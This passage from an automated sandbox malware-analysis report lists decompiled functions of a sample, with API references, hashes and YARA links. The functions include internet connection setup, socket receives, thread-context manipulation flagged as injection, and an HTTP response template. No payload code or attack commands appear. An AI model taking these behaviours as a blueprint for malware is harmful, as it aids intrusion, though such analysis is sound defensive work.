                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: NamedPipe$ErrorHandleLast$CloseCreateDisconnectFileStateWait
                                                                  • String ID:
                                                                  • API String ID: 321441075-0
                                                                  • Opcode ID: 8e22a79f635daea726f16e9a1de1856625349972feb6a0dc3e05b0ce7be68105
                                                                  • Instruction ID: 3d5577f694e9def95fb2e03d41aaac4b6529cd15a62547f9ebeb2eae7d659081
                                                                  • Opcode Fuzzy Hash: 8e22a79f635daea726f16e9a1de1856625349972feb6a0dc3e05b0ce7be68105
                                                                  • Instruction Fuzzy Hash: 6911C132204A5082FB108B29F61875E7368F789BB5F505A20EA6A47A96CF7CC8858B40
                                                                  Function 009ACAB0 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                                  • String ID:
                                                                  • API String ID: 2328795619-0
                                                                  • Opcode ID: 1e9c5c85f24affc1f4ad8e74ab22dcd61c8d6539f6415cbf48a583a031d25dd9
                                                                  • Instruction ID: 5078477306c2276c0474842e1b2e75a3636a622cc10b656481ebfbc902811f37
                                                                  • Opcode Fuzzy Hash: 1e9c5c85f24affc1f4ad8e74ab22dcd61c8d6539f6415cbf48a583a031d25dd9
                                                                  • Instruction Fuzzy Hash: C85168B170525482DB288A67950066A76A4F787BF4F188F21AEBD4BFD4DB38C491C7C0
                                                                  Function 009B60F4 Relevance: 9.1, APIs: 6, Instructions: 132COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _mtinitlocknum.LIBCMT ref: 009B6121
                                                                    • Part of subcall function 009AFBF8: _FF_MSGBANNER.LIBCMT ref: 009AFC15
                                                                    • Part of subcall function 009AFBF8: _NMSG_WRITE.LIBCMT ref: 009AFC1F
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 009B61A4
                                                                  • EnterCriticalSection.KERNEL32 ref: 009B61C0
                                                                  • LeaveCriticalSection.KERNEL32 ref: 009B61D0
                                                                  • _calloc_crt.LIBCMT ref: 009B6246
                                                                  • __lock_fhandle.LIBCMT ref: 009B62AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 445582508-0
                                                                  • Opcode ID: 950df99e0b1803de4249a0c80206a0c7c3be2a4a1d9f79e42705502b1673a992
                                                                  • Instruction ID: b06740be7e0360bf3ec96b8bc8bea29b558eb53ec64aab6a746b97be3de400fe
                                                                  • Opcode Fuzzy Hash: 950df99e0b1803de4249a0c80206a0c7c3be2a4a1d9f79e42705502b1673a992
                                                                  • Instruction Fuzzy Hash: 1B515832604B8082EF10DF25E990369B769FB98B78F19452ADE5E877A5DB3CD842C710
                                                                  Function 009A0938 Relevance: 9.1, APIs: 6, Instructions: 126COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 009A4720: malloc.LIBCMT ref: 009A473C
                                                                    • Part of subcall function 009AC5C0: _errno.LIBCMT ref: 009AC517
                                                                    • Part of subcall function 009AC5C0: _invalid_parameter_noinfo.LIBCMT ref: 009AC522
                                                                  • fseek.LIBCMT ref: 009A09D4
                                                                    • Part of subcall function 009ACE44: _errno.LIBCMT ref: 009ACE6C
                                                                    • Part of subcall function 009ACE44: _invalid_parameter_noinfo.LIBCMT ref: 009ACE77
                                                                  • _ftelli64.LIBCMT ref: 009A09DC
                                                                    • Part of subcall function 009ACEB8: _errno.LIBCMT ref: 009ACED6
                                                                    • Part of subcall function 009ACEB8: _invalid_parameter_noinfo.LIBCMT ref: 009ACEE1
                                                                  • fseek.LIBCMT ref: 009A09EC
                                                                    • Part of subcall function 009ACE44: _fseek_nolock.LIBCMT ref: 009ACE95
                                                                  • GetFullPathNameA.KERNEL32 ref: 009A0A0F
                                                                  • malloc.LIBCMT ref: 009A0A2C
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                    • Part of subcall function 0099CFCC: malloc.LIBCMT ref: 0099CFDF
                                                                    • Part of subcall function 0099CFFC: htonl.WS2_32 ref: 0099D007
                                                                  • fclose.LIBCMT ref: 009A0AE9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                                                                  • String ID:
                                                                  • API String ID: 3587854850-0
                                                                  • Opcode ID: 3da8f025ece7394c703a7f887b7126d067a18409367c8c891ce5d9828b598cd7
                                                                  • Instruction ID: 1b2d41b4781f16fff212defea212ce2b864dc31b22d30b553c652035090fb83e
                                                                  • Opcode Fuzzy Hash: 3da8f025ece7394c703a7f887b7126d067a18409367c8c891ce5d9828b598cd7
                                                                  • Instruction Fuzzy Hash: B341F62230569092DB10EB2AE85576EB395F7CAFD0F508126EE5E47B96DF7CC502CB80
                                                                  Function 009A4394 Relevance: 9.1, APIs: 6, Instructions: 113COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetACP.KERNEL32 ref: 009A43AC
                                                                  • GetOEMCP.KERNEL32 ref: 009A43B6
                                                                  • GetCurrentProcessId.KERNEL32 ref: 009A43DC
                                                                  • GetTickCount.KERNEL32 ref: 009A43E4
                                                                    • Part of subcall function 009AC3EC: _getptd.LIBCMT ref: 009AC3F4
                                                                  • GetCurrentProcess.KERNEL32 ref: 009A4420
                                                                    • Part of subcall function 0099FF18: GetModuleHandleA.KERNEL32 ref: 0099FF2D
                                                                    • Part of subcall function 0099FF18: GetProcAddress.KERNEL32 ref: 0099FF3D
                                                                  • GetCurrentProcessId.KERNEL32 ref: 009A4492
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                                                                  • String ID:
                                                                  • API String ID: 3426420785-0
                                                                  • Opcode ID: ac2cadb21b7d3e22279a6dd461b8896bd4e31f88a9562ce911e8d9ee9c12a71b
                                                                  • Instruction ID: 8b90cac38c4794fbd7f227c47c2fdeb7e63ed977631e489705ee65dd883f0a0c
                                                                  • Opcode Fuzzy Hash: ac2cadb21b7d3e22279a6dd461b8896bd4e31f88a9562ce911e8d9ee9c12a71b
                                                                  • Instruction Fuzzy Hash: 0341E82571061096FF00EBB5DC8579D77A4FBC9B94F400422DE0A87A6AEF3CC00AC750
                                                                  Function 0099E720 Relevance: 9.1, APIs: 6, Instructions: 108networkCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 009AA948: RevertToSelf.ADVAPI32 ref: 009AA956
                                                                  • InternetOpenA.WININET ref: 0099E7DD
                                                                  • InternetSetOptionA.WININET ref: 0099E7FD
                                                                  • InternetSetOptionA.WININET ref: 0099E815
                                                                  • InternetConnectA.WININET ref: 0099E84B
                                                                  • InternetSetOptionA.WININET ref: 0099E888
                                                                  • InternetSetOptionA.WININET ref: 0099E8B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Internet$Option$ConnectOpenRevertSelf
                                                                  • String ID:
                                                                  • API String ID: 1513466045-0
                                                                  • Opcode ID: 411921f0b780bda79444755ea1b09c1352abee8551b093482236e8c856c606c8
                                                                  • Instruction ID: ca8edb5a7e1c43cf709d5af8bb733bd0c21f6b5839de4e4bbee90573b961b385
                                                                  • Opcode Fuzzy Hash: 411921f0b780bda79444755ea1b09c1352abee8551b093482236e8c856c606c8
                                                                  • Instruction Fuzzy Hash: 7441FF3521074182EF24DF96F490BADB7A9F7D5B88F44401ADE4A17B62CF7CC4458740
                                                                  Function 009A5594 Relevance: 9.1, APIs: 6, Instructions: 99networkCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009A55C6
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • htonl.WS2_32 ref: 009A55F9
                                                                  • recvfrom.WS2_32 ref: 009A563D
                                                                  • WSAGetLastError.WS2_32 ref: 009A564A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                                                                  • String ID:
                                                                  • API String ID: 2310505145-0
                                                                  • Opcode ID: 7b82969d95b8156ac40bd70badc804edefe668ed425a8211da48a1875c208419
                                                                  • Instruction ID: 2900673b6e31b9b0f6626496addd6a2fe35057d27d56eb6cd4d0ab177e47d3d8
                                                                  • Opcode Fuzzy Hash: 7b82969d95b8156ac40bd70badc804edefe668ed425a8211da48a1875c208419
                                                                  • Instruction Fuzzy Hash: 1441E172704B4086EB108F26F84071E77A4F799BA9F558122EE4957B75DF3CC481CB80
                                                                  Function 0355BA07 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                  • String ID:
                                                                  • API String ID: 1547050394-0
                                                                  • Opcode ID: f4b46934b61cd0a6c515992788bbf3f7098805acb66c62ab169b4e9252767cc2
                                                                  • Instruction ID: ba82941d1b98c18b92d935d721780f757d34706abeeca86473fc00aa283bcad9
                                                                  • Opcode Fuzzy Hash: f4b46934b61cd0a6c515992788bbf3f7098805acb66c62ab169b4e9252767cc2
                                                                  • Instruction Fuzzy Hash: FB21A730618F4A4FD795EB2C642933976F1FBD9210F05096FA849C7270DF34E9418396
                                                                  Function 009A2BC8 Relevance: 9.1, APIs: 6, Instructions: 72threadinjectionCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Thread$Context$Resume
                                                                  • String ID:
                                                                  • API String ID: 1758964557-0
                                                                  • Opcode ID: 47e75b3e4a0b68d7fcf2b46edb3e1c0b3662b0cb436c7ebb95251cbeea04a70d
                                                                  • Instruction ID: 8007b68ab125a74c674c0c7624387fb32775611bd21a9375a1796afd0a3b396c
                                                                  • Opcode Fuzzy Hash: 47e75b3e4a0b68d7fcf2b46edb3e1c0b3662b0cb436c7ebb95251cbeea04a70d
                                                                  • Instruction Fuzzy Hash: 3B219132308B8182D7208F19F5443AE7368F749BE0F648675EA9943B49DF78C945C780
                                                                  Function 009AC5C0 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                  • String ID:
                                                                  • API String ID: 1547050394-0
                                                                  • Opcode ID: 835e35de52116243c5232cdf7460fa3a6cc22b4b2a138782764f63ca95174e3a
                                                                  • Instruction ID: 2b45a82f856f58238d9d095507c3408ee41ba7d4935f151da14773bff897d63a
                                                                  • Opcode Fuzzy Hash: 835e35de52116243c5232cdf7460fa3a6cc22b4b2a138782764f63ca95174e3a
                                                                  • Instruction Fuzzy Hash: 6711CBE1B1D78285DB119B32990131EA6D5BBC6BD0F445821FE4A9BB15DF3CD4418790
                                                                  Function 0099F810 Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 0099F831
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • free.LIBCMT ref: 0099F86C
                                                                  • fwrite.LIBCMT ref: 0099F8AD
                                                                  • fclose.LIBCMT ref: 0099F8B5
                                                                  • free.LIBCMT ref: 0099F8C2
                                                                    • Part of subcall function 009AB1E8: HeapFree.KERNEL32 ref: 009AB1FE
                                                                    • Part of subcall function 009AB1E8: _errno.LIBCMT ref: 009AB208
                                                                    • Part of subcall function 009AB1E8: GetLastError.KERNEL32 ref: 009AB210
                                                                  • GetLastError.KERNEL32 ref: 0099F8C7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                                                                  • String ID:
                                                                  • API String ID: 1616846154-0
                                                                  • Opcode ID: fe4bbc95ef4b08574859fefc5ba918ca2079e897777f34b89423cbeb1ae88b9b
                                                                  • Instruction ID: e821d02e144af5cd58851c1b9f8fcb271798f9a32ccd609587ce07c5b1212ff1
                                                                  • Opcode Fuzzy Hash: fe4bbc95ef4b08574859fefc5ba918ca2079e897777f34b89423cbeb1ae88b9b
                                                                  • Instruction Fuzzy Hash: 6911C41170878082DE10E767A06437EA351EBC6FE4F444631FE9E5BB8ADF2CC6018780
                                                                  Function 009AB0E4 Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009AB107
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • malloc.LIBCMT ref: 009AB115
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB2BC
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2C1
                                                                  • malloc.LIBCMT ref: 009AB137
                                                                  • _snprintf.LIBCMT ref: 009AB152
                                                                    • Part of subcall function 009AB5DC: _errno.LIBCMT ref: 009AB613
                                                                    • Part of subcall function 009AB5DC: _invalid_parameter_noinfo.LIBCMT ref: 009AB61E
                                                                  • malloc.LIBCMT ref: 009AB16D
                                                                  Strings
                                                                  • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 009AB13C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                                                                  • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                                                                  • API String ID: 3518644649-2739389480
                                                                  • Opcode ID: 28f7500e5a57a94553abab49d0b41e4cfd04cc5b26ced466caba407a8288f66b
                                                                  • Instruction ID: aa12313f19665d4a3c161a65e551b121fa192d47c52c21e7d8c0857a61afe5ab
                                                                  • Opcode Fuzzy Hash: 28f7500e5a57a94553abab49d0b41e4cfd04cc5b26ced466caba407a8288f66b
                                                                  • Instruction Fuzzy Hash: 0701C031705B5041D644DB52B84472DA799F7DABE0F44522AEEA9977C6CF38C0418780
                                                                  Function 035435B7 Relevance: 8.9, APIs: 7, Instructions: 181COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 03543604
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • malloc.LIBCMT ref: 0354360F
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A703
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A708
                                                                  • free.LIBCMT ref: 035436F6
                                                                  • free.LIBCMT ref: 035436FE
                                                                  • free.LIBCMT ref: 03543706
                                                                  • free.LIBCMT ref: 03543712
                                                                  • free.LIBCMT ref: 0354371F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                  • String ID:
                                                                  • API String ID: 2761444284-0
                                                                  • Opcode ID: 01a976f15273147b50ec7d6acdbedb3c21a43aceee13bf4a7ef4d6a722d450b4
                                                                  • Instruction ID: 5c0a1282710517c809010f31cdc59b93e66b63431190cebaad55536409fc3b68
                                                                  • Opcode Fuzzy Hash: 01a976f15273147b50ec7d6acdbedb3c21a43aceee13bf4a7ef4d6a722d450b4
                                                                  • Instruction Fuzzy Hash: EC41C438618F0B4FD75EEB6CA45157A73D4FB89304B40026DD88BC3226FF24E86686C5
                                                                  Function 00994170 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009941BD
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • malloc.LIBCMT ref: 009941C8
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB2BC
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2C1
                                                                  • free.LIBCMT ref: 009942AF
                                                                  • free.LIBCMT ref: 009942B7
                                                                  • free.LIBCMT ref: 009942BF
                                                                  • free.LIBCMT ref: 009942CB
                                                                  • free.LIBCMT ref: 009942D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 996410232-0
                                                                  • Opcode ID: d822beeafb31d47687cbbf35900d7bfd8460a788cd57ec4d81b27c9478e24994
                                                                  • Instruction ID: a9c115ccd0e1be71477e64d3d504b0ec08ad5784b7cd23f596dfd041f3c24a1c
